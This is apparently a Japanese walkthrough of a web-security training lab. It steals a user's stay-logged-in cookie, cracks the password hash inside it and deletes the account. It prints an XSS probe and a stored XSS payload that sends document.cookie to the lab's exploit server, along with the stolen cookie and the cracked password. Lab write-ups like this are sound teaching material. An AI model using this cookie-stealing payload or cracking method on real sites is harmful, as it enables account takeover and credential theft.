Hello there, ('ω')ノ

 

オフラインパスワードクラッキングを。

このラボでは、ユーザのパスワードハッシュをCookieに保存して。

ラボには、コメント機能にXSSの脆弱性も含まれていて。

Carlosの stay-logged-inクッキとそれを使用して彼のパスワードを解読して。

carlosのアカウントを削除せよと。

まずは、ログインして。

 

 

リクエストを確認して。

 

 

Cookieのstay-logged-inをBase64でデコードすると。

username+':'+md5HashOfPasswordが確認できて。

　51dc30ddc473d43a6011e9ebba6ca770

 

下記のサイトで、ハッシュをクラックしてみると。

パスワードが確認できて。

注意事項として顧客サイトをテストする際には、Webサイト上のサービスではなく。

セキュリティ上、hashcatなどのツールを使用する必要があって。

　https://crackstation.net/

 

 

次にコメントにXSSのエクスプロイトを投稿して。

　<img src=x onerror=alert(1) ?>

 

 

XSSの脆弱性が確認できて。

 

 

エクスプロイトサーバのURLをコピーしておいて。

 

 

再度、下記のペイロードを投稿して。

　<script>document.location='https://ac3e1fa31e7143cd80f72330012d00f7.web-security-academy.net/'+document.cookie

 

アクセスログでで、stay-logged-inを確認して。

　stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz

 

 

さきほどと同様にデコードして。

 

 

ハッシュをクラックすると、パスワードがわかったので。

　onceuponatime

carlosでログインして。

 

 

Deleteして。

 

 

再度、パスワードを入力してDeleteすると。

 

 

クリアできた。

 

 

Best regards, (^^ゞ